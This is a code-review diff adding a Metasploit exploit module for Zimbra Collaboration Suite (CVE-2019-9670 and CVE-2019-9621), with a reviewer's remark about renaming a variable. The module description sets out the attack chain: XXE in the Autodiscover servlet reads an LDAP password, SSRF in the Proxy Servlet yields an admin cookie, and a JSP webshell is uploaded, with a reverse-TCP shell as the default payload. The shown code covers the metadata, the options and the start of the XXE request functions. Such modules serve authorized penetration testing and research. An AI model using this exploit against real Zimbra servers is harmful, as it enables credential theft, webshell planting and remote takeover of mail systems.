modules/exploits/linux/http/zimbra_xxe_rce.rb

```diff
@@ -0,0 +1,254 @@
+  include REXML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF',
+      'Description'    => %q{
+        This module exploits an XML external entity vulnerability and a
+        server side request forgery to get unauthenticated code execution
+        on Zimbra Collaboration Suite. The XML external entity vulnerability
+        in the Autodiscover Servlet is used to read a Zimbra configuration
+        file that contains an ldap password for the 'zimbra' account. The
+        zimbra credentials are then used to get a user authentication cookie
+        with an AuthRequest message. Using the user cookie, a server side request
+        forgery in the Proxy Servlet is used to proxy an AuthRequest with
+        the 'zimbra' credentials to the admin port to retrieve an admin
+        cookie. After gaining an admin cookie the Client Upload servlet is
+        used to upload a jsp webshell that can be triggered from the web
+        server to get command execution on the host. The issues reportedly
+        affects Zimbra Collaboration Suite v8.5 to v8.7.11.
+
+        This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64
+        UBUNTU16_64 FOSS edition.
+      },
+      'Author'         =>
+        [
+          'An Trinh',         # Discovery
+          'Khanh Viet Pham',  # Discovery
+          'Jacob Robles'      # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-9670'],
+          ['CVE', '2019-9621'],
+          ['URL', 'https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultOptions' => {
+        'RPORT' => 8443,
+        'SSL' => true,
+        'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+      },
+      'Stance'         => Stance::Aggressive,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 13 2019' # Blog post date
+    ))
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'Zimbra application base path', '/']),
+      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])
+    ]
+  end
+
+  def xxe_req(data)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/autodiscover'),
+      'encode_params' => false,
+      'data' => data
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 503
+    res
+  end
+
+  def soap_discover(check_soap=false)
+    xml = Document.new
+
+    xml.add_element('Autodiscover')
+    xml.root.add_element('Request')
+
+    req = xml.root.elements[1]
+
+    req.add_element('EMailAddress')
+    req.add_element('AcceptableResponseSchema')
+
+    sub = 'REPLACE'
```

Comment:
I would rename this variable, since it's shared with the `sub` method... which is used below.